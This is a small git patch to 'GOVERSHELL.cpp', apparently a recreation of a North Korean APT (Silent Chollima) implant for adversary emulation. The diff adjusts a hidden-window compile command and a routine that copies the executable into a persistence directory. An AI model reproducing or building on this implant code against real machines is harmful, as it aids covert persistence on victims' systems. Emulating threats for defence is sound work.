From 49a8fa656e4ead9c21ce308cbb810835b96545bb Mon Sep 17 00:00:00 2001 From: S3N4T0R <121706460+S3N4T0R-0X0@users.noreply.github.com> Date: Tue, 23 Dec 2025 06:19:03 -0500 Subject: [PATCH] Update GOVERSHELL.cpp --- North Koreans APT/Silent Chollima/GOVERSHELL.cpp | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/North Koreans APT/Silent Chollima/GOVERSHELL.cpp b/North Koreans APT/Silent Chollima/GOVERSHELL.cpp index 4615024..40e6d31 100644 --- a/North Koreans APT/Silent Chollima/GOVERSHELL.cpp +++ b/North Koreans APT/Silent Chollima/GOVERSHELL.cpp @@ -1,6 +1,6 @@ // Compile: x86_64-w64-mingw32-g++ -std=c++17 -o GOVERSHELL.exe GOVERSHELL.cpp -static -lwinhttp -lws2_32 -lgdi32 -mwindows -lole32 -loleaut32 -// Execution: GOVERSHELL -SilentChollima +// Execution: GOVERSHELL.exe -SilentChollima #include #include @@ -127,7 +127,7 @@ bool create_persistence_dir() { } bool copy_to_persistence() { - full_exe_path = persist_dir + "\\ GOVERSHELL"; + full_exe_path = persist_dir + "\\ GOVERSHELL.exe"; std::ifstream src(get_module_path(), std::ios::binary); if (!src) return false; std::ofstream dst(full_exe_path, std::ios::binary);